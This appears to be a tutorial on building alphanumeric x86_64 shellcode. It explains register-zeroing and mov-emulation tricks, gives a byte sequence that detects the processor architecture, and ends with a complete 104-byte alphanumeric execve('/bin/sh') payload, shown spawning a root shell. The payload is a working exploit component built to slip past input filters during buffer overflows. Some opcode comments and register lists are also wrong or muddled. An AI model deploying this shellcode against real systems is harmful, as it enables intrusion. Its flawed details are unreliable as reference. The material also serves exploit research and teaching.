To set the value of %rbx directly, imul, xor, and movslq can be used. It is similar for other registers:

  •  %rbp
  •  %rsp

Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:

  • 0x30 is a multi-byte xor instruction. Requiring at least two operands (even if one of them denotes a register).
  • 0x31 is as flexible as 0x30.
  • 0x32 is just as flexible, although the offsets will change source side rather than destination side.
  • 0x33 is the opposite of 0x31 and as flexible.
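
For reference, the xor opcodes in this range can be tabulated together with their ASCII characters. This is a small Python sketch; the operand descriptions use destination-first order and the dictionary name <code>XOR_OPCODES</code> is an assumption made for illustration.

```python
# opcode -> (destination, source)
XOR_OPCODES = {
    0x30: ("8 bit register or memory", "8 bit register"),
    0x31: ("register or memory", "register"),
    0x32: ("8 bit register", "8 bit register or memory"),
    0x33: ("register", "register or memory"),
    0x34: ("%al", "8 bit immediate"),
    0x35: ("%eax", "32 bit immediate"),
}

# Every opcode in the range is an ASCII digit.
AS_TEXT = "".join(chr(opcode) for opcode in sorted(XOR_OPCODES))
```

0x30 and 0x31 write to the memory-capable operand, while 0x32 and 0x33 read from it, which is why the offsets move from the destination side to the source side.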

Combining the knowledge of xor with the knowledge of the stack, when any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:

  • %rbx
  • %rsp
  • %rbp
  • %rsi
  • %rdi

First, utilise push and pop to simulate 'mov':

<syntaxhighlight lang="asm">
push %rsp    # \x54
pop  %rcx    # \x59
pop  %rax    # \x5a (This just sets the pointer back)
</syntaxhighlight>

Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:

<syntaxhighlight lang="asm">
push %rsi               # \x56
xor %ss:(%rcx), %rsi    # \x36\x48\x33\x31
pop %r8                 # \x41\x58
push %rdi               # \x57
xor %ss:(%rcx), %rdi    # \x36\x48\x33\x39
pop %r8
</syntaxhighlight>
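
The zeroing trick relies on a value xor'ed with its own pushed copy always being 0. The Python sketch below models that and also checks that the byte sequence is alphanumeric; <code>zero_register</code> is a hypothetical helper, and the bytes for the final pop %r8 are assumed to match the earlier pop %r8 (\x41\x58).

```python
def zero_register(value: int) -> int:
    """Model `push %reg` followed by `xor %ss:(%rcx), %reg`.

    Assumes %rcx points at the slot the push just wrote.
    """
    pushed_copy = value          # push %reg: the stack slot mirrors the register
    return value ^ pushed_copy   # xor with its own copy always yields 0


# push %rsi; xor %ss:(%rcx),%rsi; pop %r8; push %rdi; xor %ss:(%rcx),%rdi; pop %r8
SEQUENCE = bytes.fromhex("56 36483331 4158 57 36483339 4158")
SEQUENCE_TEXT = SEQUENCE.decode("ascii")
```

The whole sequence reads as "V6H31AXW6H39AX".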

Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:

  • %rax
  • %rcx
  • %rdx
  • %rsi
  • %rdi
  • %r8
  • %r9
  • %r10
  • %r14
  • %r15

So far, in this sample, full control has not been utilized over:

  • %rsp
  • %rbp
  • %rbx
  • %r11
  • %r12
  • %r13

As with push, controllable data is required before a register can be set. Where pop is concerned, something may need to be pushed to the stack first; in this case, only a zero register is required. Because of the way XOR works, once any register holds zero (here %rax is used as the zero register), it can be used to get %rbx, %rsp, and %rbp to zero if needed:

To get %rbx:

<syntaxhighlight lang="asm">
xor %ss:0x30(%rcx), %rax          # store that value in rax
xor %rax, %ss:0x30(%rcx)          # Null that area of stack
imul $0x30,%ss:0x30(%rax),%rbx    # 0x30 * 0 = 0
imul $0x30,%ss:0x30(%rax),%rbp    # 0x30 * 0 = 0
</syntaxhighlight>

Once the stack space, as well as the destination, is set to zero, %rax can effectively be mov(ed) into %rbp:

<syntaxhighlight lang="asm">
xor  %rax,%ss:0x30(%rcx)    # 36 48 31 41 30
xor  %ss:0x30(%rcx),%rbp    # 36 48 33 69 30
</syntaxhighlight>
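
The mov emulation works because xor'ing a value into a zeroed location copies it. A minimal Python model is sketched here; <code>xor_mov</code> is a hypothetical name, and the scratch slot and destination default to zero as the text requires.

```python
def xor_mov(src: int, scratch: int = 0, dst: int = 0) -> int:
    """Model xor %rax,%ss:0x30(%rcx) followed by xor %ss:0x30(%rcx),%rbp."""
    scratch ^= src    # the zeroed stack slot now holds a copy of the source
    dst ^= scratch    # the zeroed destination now holds the same copy
    return dst


FIRST_XOR = bytes.fromhex("3648314130").decode("ascii")
SECOND_XOR = bytes.fromhex("3648336930").decode("ascii")
```

If the scratch slot or the destination is not zero beforehand, the result is the xor of all three values rather than a clean copy, which is why the zeroing step comes first. The two instructions read as "6H1A0" and "6H3i0".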

The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1, 2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov:

<syntaxhighlight lang="asm">
movslq %ss:0x30(%rcx), %rsi
xor %rsi, %ss:0x30(%rsi)
</syntaxhighlight>

This can come in quite handy when chunking large pieces of data to 0.

Environment

GetCPU

Architecture can only be determined when compatible channels between the target instruction set architectures can be isolated. As long as the instructions perform valid behavior and do not cause access faults on operating systems native to the architecture, it is possible to use a single bytecode sequence in order to determine architecture across a variety of processors. It generally takes a great amount of familiarity and experience with two or more given instruction sets to write shellcode for multiple architectures.

The x86_64 instruction set architecture (also known as x64) does not vastly differ from x86 because of AMD's correcting of Intel's calling convention and architecture.

An alphanumeric instruction compatibility chart can be derived by cross referencing available alphanumeric 64 bit instructions with available printable 32 bit instructions.

Inter-compatibility theory

Specifically non-compatible are the 32 and 64 bit opcodes in the range 0x40-0x4f, as they allow a 32 bit processor to increment or decrement its general-purpose registers, but become prefixes for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers in x64 environments, %r8-%r15.

Since not all opcodes are intercompatible, yet comparisons and conditional jumps are intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes.

By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set.

Using the pop instruction is the most effective way to set the value of a register due to instructional limitations (to keep the code alphanumeric). Using an alternative register to %rsp or %esp as a placeholder for the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.

Practically Applied: Code

This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns equal on a 32 bit system and not equal on a 64 bit system.

When implementing this bytecode, a conditional jump afterwards may be best reserved for the t (0x74) and u (0x75) instructions, jump if equal and jump if not equal, respectively.

  • Assembled:
TX4HPZTAZAYVH92
  • Disassembly:

The table here lists each opcode sequence with its x86 and x64 disassembly. Most rows are equivalent on both instruction sets; the rows containing 0x41 or 0x48 decode differently.

OpCodes     x86                 x64
54          push %esp           push %rsp
58          pop %eax            pop %rax
34 48       xor $0x48, %al      xor $0x48, %al
50          push %eax           push %rax
5a          pop %edx            pop %rdx
54          push %esp           push %rsp
41 5a       inc %ecx            pop %r10
            pop %edx
41 59       inc %ecx            pop %r9
            pop %ecx
56          push %esi           push %rsi
48 39 32    dec %eax            cmp %rsi,(%rdx)
            cmp %esi,(%edx)

This code executes similarly, but not identically, on both a 32-bit and 64-bit system. The key discrepancy between how the two architectures execute this code is centered around the opcodes "0x41 - 0x4f".

Under a 32-bit architecture, this code pops the value of esp (which was pushed onto the stack previously) into edx and increments ecx. Since the esp register is a pointer to the top of the stack, edx now contains a pointer to the top of the stack. After this is done, the shellcode continues on to push esi onto the stack - so the value of esi now resides at the top of the stack. When the code executes its final comparison - "cmp %esi, (%edx)" - it is comparing the value of esi to the value that edx points to. As edx points to the top of the stack, and because esi has just been pushed to the top of the stack, the resulting comparison is between the value esi and the value esi. Therefore, equal is returned.

Under a 64-bit architecture the comparison is not equal. The opcodes "41 5a 41 59" have a different function: instead of popping the value of rsp into rdx, the first pop places it into the 64-bit register %r10, and neither %ecx nor %rcx is incremented, as 0x41 is used as a prefix to access the registers added by the 64-bit architecture. As a result, when the final comparison is made between rsi and the value referenced by rdx, it returns not equal, as rdx does not point to the top of the stack.

On a 64-bit system, this will not cause a segfault because %rdx still holds the earlier stack pointer value xored with 0x48, so (%rdx) points to somewhere inside the stack.
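The behavior described above can be followed in a small Python model of the stack. This is a sketch under stated assumptions, not an emulator: the function name `run_detector`, the starting stack pointer, the value placed in the source-index register, and the `FILLER` value for stack slots the bytecode never wrote are all hypothetical.

```python
FILLER = 0xDEADBEEF  # assumed content of stack slots the code never wrote


def run_detector(bits, sp=0x7FFF0000, si=0x1337):
    """Model TX4HPZTAZAYVH92; return True if the final cmp sees 'equal'."""
    word = bits // 8
    mem = {}
    reg = {"sp": sp, "ax": 0, "cx": 0, "dx": 0, "si": si, "r9": 0, "r10": 0}

    def push(value):
        reg["sp"] -= word
        mem[reg["sp"]] = value

    def pop(name):
        reg[name] = mem.get(reg["sp"], FILLER)
        reg["sp"] += word

    push(reg["sp"])          # 54     push sp (value before the decrement)
    pop("ax")                # 58     pop ax
    reg["ax"] ^= 0x48        # 34 48  xor $0x48, %al
    push(reg["ax"])          # 50     push ax
    pop("dx")                # 5a     pop dx
    push(reg["sp"])          # 54     push sp
    if bits == 32:
        reg["cx"] += 1       # 41     inc %ecx
        pop("dx")            # 5a     pop %edx
        reg["cx"] += 1       # 41     inc %ecx
        pop("cx")            # 59     pop %ecx
    else:
        pop("r10")           # 41 5a  pop %r10
        pop("r9")            # 41 59  pop %r9
    push(reg["si"])          # 56     push si
    if bits == 32:
        reg["ax"] -= 1       # 48     dec %eax
    # 39 32: compare si with the value dx points to
    return mem.get(reg["dx"], FILLER) == reg["si"]


print(run_detector(32), run_detector(64))
```

In the 64 bit run the comparison reads the slot at the original stack pointer xored with 0x48, which the bytecode never wrote, so the result depends on the filler assumption; on a real system that slot simply holds whatever was on the stack before.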

Last call

Assembled x64
XTX4E4UH10H30

The steps taken in order to obtain the address to the beginning of the shellcode in only alphanumeric code are a little more complex.

First, to prevent destroying the return pointer (the target data), at least 8 must be added to the stack pointer. This can be done with the use of any conventional pop operation, in this case pop %rax. %rsp is then moved into %rax through a push / pop mov emulation.

 
  pop %rax
  push %rsp                 # move pointer to %rsp into %rax
  pop %rax
 


Because the pop has added 0x8 to %rsp, 0x10 must be subtracted from %rax in order to access the return pointer. This is emulated by XORing %al with 0x45 and then 0x55:


 
  xor $0x45,%al            # subtract 0x10 from %rax
  xor $0x55,%al
 

Since 0x45 xor 0x55 is 0x10, this effectively runs a not operation against a single bit (bit 4 of %al). Because of this, the operation is actually + or - 0x10, depending on whether that bit was clear or set, and is not always guaranteed to work on its first execution. The problem is very easily mitigated through repeated execution (and may not work at times with aslr disabled).
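The + or - behavior is easy to confirm with plain integer arithmetic. The following Python sketch uses the hypothetical helpers `xor_al` and `adjust`, and the sample addresses are made up for illustration.

```python
def xor_al(rax, imm8):
    """Emulate `xor $imm8, %al`: only the low byte of %rax changes."""
    return (rax & ~0xFF) | ((rax ^ imm8) & 0xFF)


def adjust(rax):
    """Apply xor $0x45, %al followed by xor $0x55, %al."""
    return xor_al(xor_al(rax, 0x45), 0x55)


# The two immediates combine into a single flip of bit 4.
print(hex(0x45 ^ 0x55))

# Bit 4 set: the pair behaves like a subtraction of 0x10.
print(hex(adjust(0x7FFEE3D0)))

# Bit 4 clear: the same pair adds 0x10 instead.
print(hex(adjust(0x7FFEE3C0)))
```

Both immediates are themselves alphanumeric (E and U), which is why the single flip is split into two xors.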

The most recently returned-from return address is then moved into %rsi through the use of an xor mov emulation:

 
  xor %rsi,(%rax)
  xor (%rax),%rsi          # move address to last instruction into %rsi
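Why the two xors above behave like a mov can be checked with a short Python sketch. The function name `xor_mov` and the sample values are hypothetical; the memory operand stands for the qword at (%rax).

```python
MASK64 = (1 << 64) - 1


def xor_mov(mem_value, reg_value):
    """Return (memory, register) after the two-instruction xor sequence."""
    # xor %rsi,(%rax): memory ^= register
    mem_value = (mem_value ^ reg_value) & MASK64
    # xor (%rax),%rsi: register ^= memory, which cancels the old register
    reg_value = (reg_value ^ mem_value) & MASK64
    return mem_value, reg_value


return_address = 0x00007FFDCAFE0010   # made-up value stored at (%rax)
old_rsi = 0x1122334455667788          # arbitrary previous %rsi

mem_after, rsi_after = xor_mov(return_address, old_rsi)
print(hex(rsi_after), hex(mem_after))
```

The register ends up holding the original memory value regardless of what it held before. The memory operand is left holding the xor of both values, so the stored return pointer itself is clobbered by this emulation.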
 

Example: Zeroing Out x86_64 CPU Registers

First %rsp is pushed to the top of the stack and the pointer address is popped into %rcx. The second pop (the third instruction) advances %rsp by 8 so that the next push writes to the address now held in %rcx.

<syntaxhighlight lang="asm">

       push %rsp
       pop %rcx
       pop %r8             

</syntaxhighlight>

The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring it with its own saved value, and the pop then sets %rsp back to %rcx + 8.

<syntaxhighlight lang="asm">

       push %rsi
       xor %ss:(%rcx), %rsi
       pop %r8

</syntaxhighlight>
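The stack bookkeeping of the two snippets above can be traced with a minimal Python sketch. The function name `zero_via_stack` and the sample values are hypothetical, and only the slot at (%rcx) is modeled.

```python
def zero_via_stack(rsp, rsi):
    """Trace push %rsp / pop %rcx / pop %r8, then push / xor / pop."""
    mem = {}

    # push %rsp ; pop %rcx : %rcx receives the stack pointer, %rsp unchanged
    rcx = rsp
    # pop %r8 : discards one qword, leaving %rsp = %rcx + 8
    rsp += 8

    # push %rsi : lands exactly on the slot %rcx points to
    rsp -= 8
    mem[rsp] = rsi
    # xor %ss:(%rcx), %rsi : xor the register with its own saved copy
    rsi ^= mem[rcx]
    # pop %r8 : restores %rsp = %rcx + 8 for the next round
    rsp += 8

    return rcx, rsp, rsi


rcx, rsp, rsi = zero_via_stack(0x7FFD00001000, 0xDEADBEEFCAFE)
print(hex(rcx), hex(rsp), rsi)
```

Because %rsp returns to %rcx + 8 after each round, the same three instructions can be repeated for any other register that has an alphanumeric push.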

Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx + 8.

<syntaxhighlight lang="asm">

       push %rdi
       xor %ss:(%rcx), %rdi
       pop %r8

</syntaxhighlight>

Zeroing out RDX is much simpler.

<syntaxhighlight lang="asm">

       push %rdi
       pop %rdx

</syntaxhighlight>

The following push and pop sets %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since the whole value 0x30 resides in %al, the xor effectively zeroes out %rax.

<syntaxhighlight lang="asm">

       push $0x30
       pop %rax
       xor $0x30, %al

</syntaxhighlight>

For %rbx and %rbp we first zero out the stack slot at %ss:0x30(%rcx). Each register is then xored into the slot, and the slot is xored back into the register, which results in the register being zeroed out.

Zero out the stack slot at %ss:0x30(%rcx). This relies on %rax already being zero.

<syntaxhighlight lang="asm">

       xor %ss:0x30(%rcx), %rax
       xor %rax, %ss:0x30(%rcx)

</syntaxhighlight>

xor %rbx into the stack slot and then xor the slot into %rbx to zero it.

<syntaxhighlight lang="asm">

       xor %rbx, %ss:0x30(%rcx)
       xor %ss:0x30(%rcx), %rbx

</syntaxhighlight>

Re-zero the stack slot, after first clearing %rax through %rdx.

<syntaxhighlight lang="asm">

       push %rdx
       pop %rax
       xor %ss:0x30(%rcx), %rax
       xor %rax, %ss:0x30(%rcx)

</syntaxhighlight>

As before, xor %rbp into the stack slot and then xor the slot into %rbp to zero it.

<syntaxhighlight lang="asm">

       xor %rbp, %ss:0x30(%rcx)
       xor %ss:0x30(%rcx), %rbp

</syntaxhighlight>
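The slot-based zeroing used for %rbx and %rbp can be followed step by step in Python. This is a sketch with a hypothetical function name, `zero_through_slot`, and made-up starting values; it assumes %rax is zero on entry, as it is after the `xor $0x30, %al` step.

```python
def zero_through_slot(slot, rax, reg):
    """Return (slot, rax, reg) after the four xors applied to one register."""
    rax ^= slot   # xor %ss:0x30(%rcx), %rax : rax takes the slot's old value
    slot ^= rax   # xor %rax, %ss:0x30(%rcx) : slot is now zero
    slot ^= reg   # xor %rbx, %ss:0x30(%rcx) : slot takes the register's value
    reg ^= slot   # xor %ss:0x30(%rcx), %rbx : register xored with itself
    return slot, rax, reg


slot, rax, rbx = zero_through_slot(slot=0xABCDEF, rax=0, reg=0x1122334455)
print(hex(slot), hex(rax), rbx)
```

After the sequence the register is zero, but both the slot and %rax now hold leftover values, which is why the text clears %rax through %rdx and zeroes the slot again before handling %rbp.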

64 bit shellcode: Conversion to alphanumeric code

  • Because of the limited instruction set, the conversion requires many mov emulations via xor, mul, movslq, push, and pop.

Starting shellcode (64-bit execve /bin/sh)

This was converted to shellcode from the example in 64 bit linux assembly
  • execve('/bin/sh');
 
.section .data
.section .text
.globl _start
_start:
 
 # a function is f(%rdi, %rsi, %rdx, %r10, %r8, %r9).
 # Use zeroed memory to zero out %rsi, %rdi, %rdx
 xor %rdi, %rdi
 push %rdi
 push %rdi
 pop %rsi
 pop %rdx
 
 # Store '/bin/sh\0' in %rdi
 movq $0x68732f6e69622f6a, %rdi
 shr $0x8,%rdi
 push %rdi
 push %rsp
 pop %rdi
 push $0x3b
 pop %rax
 syscall                                # execve('/bin/sh', null, null)
                                        # function no. is 59/0x3b - execve()
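The movq / shr pair in the listing is what produces a null-terminated string without a null byte in the immediate. A short Python check of that arithmetic, using only the constant from the listing (the variable names are illustrative):

```python
import struct

# Immediate loaded by movq: the bytes "j/bin/sh" in little-endian order.
packed = 0x68732F6E69622F6A
print(struct.pack("<Q", packed))

# shr $0x8 drops the leading 'j' and shifts a zero byte in at the top,
# which becomes the string terminator once the qword is pushed.
shifted = packed >> 8
print(struct.pack("<Q", shifted))
```

The first byte of the immediate is only padding; any non-zero byte would serve the same purpose.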
 
  • execve('/bin/sh')
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

Shellcode Analysis

Immediately before the syscall:

  •  %rax is set to 0x3b
  •  %rdi is a pointer to '/bin/sh\0'
  •  %rsi and %rdx are null

To reproduce this, because the syscall opcode (0x0f 0x05) is not alphanumeric, it must be written at runtime to a location that will eventually be executed ahead of currently executing code. The xor and imul instructions can then be used to set values on registers.

Writing the syscall

The very first part of the code is used to determine location and write a syscall to the end.

 
  pop %rax
  push %rsp
  pop %rax
  xor $0x65,%al
  xor $0x75,%al
  xor %rsi, (%rax)   # mov emulated into rsi
  xor (%rax), %rsi
  push %rsi
  pop %rcx
  pushq $0x3030474a
  pop %rax
  xor %eax,0x64(%rcx)  
 


  • This next xor comes out to 0x0000050f, which is stored on the stack in little-endian byte order as 0f 05 00 00. 0x0f05 is the machine code for a syscall.

0x3030474a xor 0x30304245 -- the "EB00" at the end of the shellcode:

  rex.RB
  rex.X xor %sil,(%rax)
  • The 'EB' in 'EB00' at the end of the shellcode has become 0x050f.
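The patch value can be verified directly. The Python sketch below uses only the two constants given above; the variable names are illustrative.

```python
import struct

KEY = 0x3030474A          # value pushed and popped into %eax ("JG00")
tail = b"EB00"            # last four bytes of the shellcode

# The dword the processor sees when it reads "EB00" from memory.
tail_dword = struct.unpack("<I", tail)[0]
print(hex(tail_dword))

# xor %eax,0x64(%rcx) rewrites those four bytes in place.
patched = struct.pack("<I", tail_dword ^ KEY)
print(patched.hex())
```

The first two patched bytes are 0f 05, the syscall instruction; the two trailing zero bytes come from the matching "00" pairs cancelling out.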

Arguments

Stack Space

  • Zero out a qword of data starting at %rcx + 0x30 (48 in decimal)
 
        # Allocate stack space
        movslq 0x30(%rcx), %rsi
        xor %esi, 0x30(%rcx)
        movslq 0x34(%rcx), %rsi
        xor %esi, 0x34(%rcx)
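The reason a movslq / xor pair always clears the dword it reads can be shown in Python. The helper names `movslq` and `zero_dword` are hypothetical, and the sample values are arbitrary.

```python
def movslq(dword):
    """Sign-extend a 32 bit value to 64 bits, as movslq does."""
    dword &= 0xFFFFFFFF
    if dword & 0x80000000:
        return dword | 0xFFFFFFFF00000000
    return dword


def zero_dword(dword):
    """movslq mem, %rsi followed by xor %esi, mem on the same dword."""
    rsi = movslq(dword)
    esi = rsi & 0xFFFFFFFF   # the xor only uses the low 32 bits
    return dword ^ esi


print(hex(movslq(0x80000001)), zero_dword(0xDEADBEEF), zero_dword(0x12345678))
```

Sign extension only affects the upper half of %rsi, so %esi always equals the dword that was read and the xor leaves zero behind. Two such pairs, at offsets 0x30 and 0x34, clear the whole qword.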
 

Register Initialization

  • The %rdx, %rdi, and %rsi registers are used for the execve() syscall. These are zeroed out to initialize their values using the stack space previously allocated.
 
        # Zero rdx, rsi, and rdi
        movslq 0x30(%rcx), %rdi
        movslq 0x30(%rcx), %rsi
        push %rdi
        pop %rdx
 

String Argument

  • /bin is placed onto the stack at the space allocated at %rcx + 0x30.
 
        push $0x5a58555a
        pop %rax
        xor $0x34313775, %eax
        xor %eax, 0x30(%rcx)
 
  • /sh\0 is placed onto the stack at the space allocated at %rcx + 0x34.
 
        push $0x6a51475a
        pop %rax
        xor $0x6a393475, %eax
        xor %eax, 0x34(%rcx)            
 
  • xor is used as a mov emulation to place '/bin/sh\0' into %rdi.
 
        xor 0x30(%rcx), %rdi
 
  • Pop once so that the following push of %rdi lands at %rcx + 8 and does not overwrite (%rcx); afterwards %rsp = %rcx + 8. Push '/bin/sh\0'.
 
        pop %rax
        push %rdi
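The two push / xor pairs used for the string can be checked with a few lines of Python. The helper name `xor_pair` is hypothetical; the four constants are the ones from the listings above.

```python
import struct


def xor_pair(pushed, key):
    """Bytes written to memory after push $pushed; pop; xor $key, %eax."""
    return struct.pack("<I", pushed ^ key)


first = xor_pair(0x5A58555A, 0x34313775)    # stored at 0x30(%rcx)
second = xor_pair(0x6A51475A, 0x6A393475)   # stored at 0x34(%rcx)
print(first + second)

# Every immediate is itself made of alphanumeric bytes.
for imm in (0x5A58555A, 0x34313775, 0x6A51475A, 0x6A393475):
    print(struct.pack("<I", imm), struct.pack("<I", imm).isalnum())
```

Because the slots at 0x30 and 0x34 were zeroed beforehand, xoring %eax into them stores the decoded bytes unchanged.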
 

Final Registers

  •  %rsi and %rdx are 0. First, push a small positive byte so that the dword read by movslq sign-extends to the same value as the full qword at (%rcx), then zero %rdi by xoring it against that qword.
 
        push $0x58
        movslq (%rcx), %rdi
        xor (%rcx), %rdi       
 
  • Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi.  %rdi then contains a pointer to '/bin/sh\0'.
 
        pop %rax
        push %rsp
        xor (%rcx), %rdi
 
  •  %rax, which still holds the 0x58 popped above, is xored with 0x63 to give 59 or 0x3b for the execve() syscall.
 
        xor $0x63, %al
 

Final registers:

  •  %rax = 0x3b
  •  %rdi = pointer to '/bin/sh\0'
  •  %rsi = null
  •  %rdx = null
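The values of %rdi and %rax in this last stage follow from two xors on the pushed byte 0x58. A minimal Python sketch of that arithmetic (variable names are illustrative, and the pointer later xored into %rdi is omitted):

```python
pushed = 0x58            # push $0x58 writes the qword 0x58 at (%rcx)

rdi = pushed             # movslq (%rcx), %rdi : positive, so no sign bits
rdi ^= pushed            # xor (%rcx), %rdi    : register is now zero

rax = pushed             # pop %rax picks the same qword back up
rax ^= 0x63              # xor $0x63, %al      : 0x58 ^ 0x63

print(rdi, hex(rax), rax)
print(chr(0x58), chr(0x63))   # both immediates are alphanumeric
```

With %rdi cleared, the later `xor (%rcx), %rdi` acts as a plain mov of the pointer that `push %rsp` stored at (%rcx).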

Payload

  • x86_64 alphanumeric execve('/bin/sh',null,null) - 104 bytes ~ Hatter
XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00
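A few properties of the payload stated in this article can be checked mechanically. The Python sketch below only inspects the string; it does not execute it. The variable names are illustrative.

```python
PAYLOAD = (
    "XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0"
    "hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00"
)

# Length claimed in the payload header.
print(len(PAYLOAD))

# Only letters and digits are present.
print(PAYLOAD.isalnum())

# The four bytes patched by xor %eax,0x64(%rcx) sit at offset 0x64.
print(PAYLOAD[0x64:])
```

The offset 0x64 used by the patching xor is exactly the payload length minus the four bytes of "EB00", which is consistent with %rcx holding the address of the first payload byte.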

Successful Execution

Unlike other alphanumeric shellcodes, this shellcode does not care about its environment, as long as it is returned to.
During a buffer overflow, this condition is met 100% of the time.
 root ~ # ./loader-64 XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00
 # id  
 uid=0(root) gid=0(root) groups=0(root)
 # uname -p
 x86_64
 # exit
 root ~ #